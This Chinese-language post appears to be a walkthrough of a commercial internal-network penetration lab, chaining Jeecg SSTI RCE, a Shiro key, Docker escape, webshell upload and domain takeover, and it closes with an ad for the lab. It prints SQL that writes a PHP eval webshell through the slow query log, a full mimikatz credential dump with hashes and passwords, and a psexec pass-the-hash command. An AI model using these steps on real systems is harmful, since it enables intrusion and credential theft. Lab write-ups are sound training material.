最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:
给公众号设为星标
一、考察要点
主机信息收集
Java代码审计
Java内存马注入
恶劣环境下的权限获取(不出网)
容器化信息收集
容器逃逸
蜜罐对抗
Webshell 杀软对抗
多级代理
域渗透
二、网络拓扑
三、题目描述
"运维人员好懒,不想做前端,打算整一下刚来的几个实习生,于是发布任务:赶紧去做报表啊一群臭实习生"
四、入口
Jeecg
先拿到目标IP为
10.10.0.3
主机信息收集得到端口信息如下
[http] 10.10.0.3:18080 [200] DocToolkit (Apache-Shiro)[http] 10.10.0.3:18088 [200] 404
发现存在两个HTTP服务,优先去看Shiro,发现直接扫描扫不到Key,就去看404
发现存在mysql的服务为弱口令,在里面找到jeecg的信息,当然也可以通过目录扫描可以扫到jeecg的路径
发现是积木报表,找最近出的nday的jeecg的SSTi来打,发现成功RCE
这里原先是设置了不出网的情况(大家可以多思考下),预期解为通过SSTI打入内存🐴,本次靶场降低难度,设置了出网的环境,于是便可反弹shell
在该目录下找到源码
五、Shiro
脱下来反编译发现了shiro的key
QZIysgMYhG7/CzIJlVpR1g==
通过这key去打主站点的shiro,该shiro也是存在Waf的,只是增强版的Shiro利用工具太强了自带了绕字节长度的Waf,所以可以直接工具一键梭哈
六、Docker逃逸
发现还是在docker里头,进行信息收集
发现存在挂载
发现挂载的是宿主机的目录
找到第二个flag
挂载进行定时任务逃逸
等待一分钟 就收到shell了
拿到交互式shell
七、Webshell对抗
代理进去扫内网,找到一处PHP的文件上传处
php大小写文件绕过
内网存在杀毒,进行webshell免杀后上传getshell
当然这里也有另外一种解法,算是一种非预期(抨击C3)
fscan 扫描出https://192.168.80.55/
访问http://192.168.80.55/phpmyadmin/index.php
结合l.php探针给的目录C:/phpStudy/PHPTutorial/WWW/l.php尝试写入webshell
写入失败绕过secure_file_priv
查看慢查询日志开启情况
show variables like '%slow_query_log%';
开启慢查询日志
set global slow_query_log=1;
修改日志文件存储的绝对路径
set global slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/a3311.php';
向日志文件中写入shell
select '<?php @eval($_POST[cmd]);?>' or sleep(11);
内网存在WeblogicRCE
发现在域内
八、域
Mimika抓一下hash
ok.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####' > https://pingcastle.com / https://mysmartlogon.com ***/mimikatz(commandline) # privilege::debugPrivilege '20' OKmimikatz(commandline) # sekurlsa::logonpasswordsAuthentication Id : 0 ; 761248 (00000000:000b9da0)Session : CachedInteractive from 1User Name : AdministratorDomain : C3TINGLogon Server : WIN-1SJG2BFF54ELogon Time : 2024/5/26 14:21:00SID : S-1-5-21-495363149-4124706654-1579529781-500msv :[00010000] CredentialKeys* NTLM : 7ab183888ecafcccf897c4a5a59c8568* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9[00000003] Primary* Username : Administrator* Domain : C3TING* NTLM : 7ab183888ecafcccf897c4a5a59c8568* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9tspkg :wdigest :* Username : Administrator* Domain : C3TING* Password : (null)kerberos :* Username : Administrator* Domain : C3TING.ORG* Password : C3ting!@#2024ssp : KOcredman :Authentication Id : 0 ; 66748 (00000000:000104bc)Session : Interactive from 1User Name : DWM-1Domain : Window ManagerLogon Server : (null)Logon Time : 2024/5/26 21:52:57SID : S-1-5-90-1msv :[00000003] Primary* Username : WEBLOGIC$* Domain : C3TING* NTLM : d74244627319328347e7536a81b6bcbc* SHA1 : f34f20925a12915b377113be3ac2255225aa2b45tspkg :wdigest :* Username : WEBLOGIC$* Domain : C3TING* Password : (null)kerberos :* Username : WEBLOGIC$* Domain : c3ting.org* Password : 'o17Fh:@t5v.ySw>/&T42E*; -qY35VDj[D4\3"&8xcM%AjjLYU2,X,,IV(;61yKRVVNXw>WsI&s5 Zdtw-tYJFS&F ZnAfsPhBx5enIIF:3hpBn#QG/[D.ussp : KOcredman :Authentication Id : 0 ; 66730 (00000000:000104aa)Session : Interactive from 1User Name : DWM-1Domain : Window ManagerLogon Server : (null)Logon Time : 2024/5/26 21:52:57SID : S-1-5-90-1msv :[00000003] Primary* Username : WEBLOGIC$* Domain : C3TING* NTLM : d74244627319328347e7536a81b6bcbc* SHA1 : f34f20925a12915b377113be3ac2255225aa2b45tspkg :wdigest :* Username : WEBLOGIC$* Domain : C3TING* Password : (null)kerberos :* Username : WEBLOGIC$* Domain : c3ting.org* Password : 'o17Fh:@t5v.ySw>/&T42E*; -qY35VDj[D4\3"&8xcM%AjjLYU2,X,,IV(;61yKRVVNXw>WsI&s5 Zdtw-tYJFS&F ZnAfsPhBx5enIIF:3hpBn#QG/[D.ussp : KOcredman :Authentication Id : 0 ; 996 (00000000:000003e4)Session : Service from 0User Name : WEBLOGIC$Domain : C3TINGLogon Server : (null)Logon Time : 2024/5/26 21:52:56SID : S-1-5-20msv :[00000003] Primary* Username : WEBLOGIC$* Domain : C3TING* NTLM : d74244627319328347e7536a81b6bcbc* SHA1 : f34f20925a12915b377113be3ac2255225aa2b45tspkg :wdigest :* Username : WEBLOGIC$* Domain : C3TING* Password : (null)kerberos :* Username : weblogic$* Domain : C3TING.ORG* Password : (null)ssp : KOcredman :Authentication Id : 0 ; 835435 (00000000:000cbf6b)Session : CachedInteractive from 1User Name : AdministratorDomain : C3TINGLogon Server : WIN-1SJG2BFF54ELogon Time : 2024/5/26 22:22:04SID : S-1-5-21-495363149-4124706654-1579529781-500msv :[00010000] CredentialKeys* NTLM : 7ab183888ecafcccf897c4a5a59c8568* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9[00000003] Primary* Username : Administrator* Domain : C3TING* NTLM : 7ab183888ecafcccf897c4a5a59c8568* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9tspkg :wdigest :* Username : Administrator* Domain : C3TING* Password : (null)kerberos :* Username : Administrator* Domain : C3TING.ORG* Password : (null)ssp : KOcredman :Authentication Id : 0 ; 405811 (00000000:00063133)Session : Interactive from 1User Name : administratorDomain : C3TINGLogon Server : WIN-1SJG2BFF54ELogon Time : 2024/5/26 21:55:37SID : S-1-5-21-495363149-4124706654-1579529781-500msv :[00000003] Primary* Username : Administrator* Domain : C3TING* NTLM : 7ab183888ecafcccf897c4a5a59c8568* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9[00010000] CredentialKeys* NTLM : 7ab183888ecafcccf897c4a5a59c8568* SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9tspkg :wdigest :* Username : Administrator* Domain : C3TING* Password : (null)kerberos :* Username : administrator* Domain : C3TING.ORG* Password : (null)ssp : KOcredman :Authentication Id : 0 ; 259823 (00000000:0003f6ef)Session : Interactive from 1User Name : weblogicDomain : C3TINGLogon Server : WIN-1SJG2BFF54ELogon Time : 2024/5/26 21:53:51SID : S-1-5-21-495363149-4124706654-1579529781-1103msv :[00000003] Primary* Username : weblogic* Domain : C3TING* NTLM : dee6489dfcd545e5a4b452fc9da06a0f* SHA1 : f959b907a86ef967bcbed9dc24954695ecbe2fa8[00010000] CredentialKeys* NTLM : dee6489dfcd545e5a4b452fc9da06a0f* SHA1 : f959b907a86ef967bcbed9dc24954695ecbe2fa8tspkg :wdigest :* Username : weblogic* Domain : C3TING* Password : (null)kerberos :* Username : weblogic* Domain : C3TING.ORG* Password : (null)ssp : KOcredman :Authentication Id : 0 ; 997 (00000000:000003e5)Session : Service from 0User Name : LOCAL SERVICEDomain : NT AUTHORITYLogon Server : (null)Logon Time : 2024/5/26 21:52:58SID : S-1-5-19msv :tspkg :wdigest :* Username : (null)* Domain : (null)* Password : (null)kerberos :* Username : (null)* Domain : (null)* Password : (null)ssp : KOcredman :Authentication Id : 0 ; 43389 (00000000:0000a97d)Session : UndefinedLogonType from 0User Name : (null)Domain : (null)Logon Server : (null)Logon Time : 2024/5/26 21:52:53SID :msv :[00000003] Primary* Username : WEBLOGIC$* Domain : C3TING* NTLM : d74244627319328347e7536a81b6bcbc* SHA1 : f34f20925a12915b377113be3ac2255225aa2b45tspkg :wdigest :kerberos :ssp : KOcredman :Authentication Id : 0 ; 999 (00000000:000003e7)Session : UndefinedLogonType from 0User Name : WEBLOGIC$Domain : C3TINGLogon Server : (null)Logon Time : 2024/5/26 21:52:52SID : S-1-5-18msv :tspkg :wdigest :* Username : WEBLOGIC$* Domain : C3TING* Password : (null)kerberos :* Username : weblogic$* Domain : C3TING.ORG* Password : (null)ssp : KOcredman :mimikatz(commandline) # exitBye!
找到域控的地址
有hash直接PTH了
python psexec.py c3ting.org/administrator@192.168.77.250 -hashes 7ab183888ecafcccf897c4a5a59c8568
九、混淆要点
redis并不是有效目标
内网的第一层Weblogic为蜜罐
mysql作为有效信息提供,仅此而已
十、总结
本次模拟为某次国企护网过程当中,存在404页面通过经验+运气扫到了Jeecg的后台,然后发现后端功能点是开放的(其实是因为该工作人员想着通过后端做点事情导致没有关及时),后端是存在1day的,但是由于不出网的情况下,1day是可以加载字节码的,所以通过RCE进去正向连接找到了该国企主站点的源码,通过代码审计获得0day并成功打入核心目标内网进行内网横向,该目标内网中存在docker,在某个容器中发现了存在df挂在到宿主机的现象,通过计划任务从而逃逸到宿主机中获取大量敏感信息,本次靶场完全1:1模拟本次护网红蓝攻防的思路,后续域渗透不是本次靶场的核心,域的真实环境敬请期待
十一、打个广告
在线内网靶场网址:bc.c3ting.com
靶场交流群(满200或过期请菜单栏联系棉花糖邀请,备注:内网靶场):
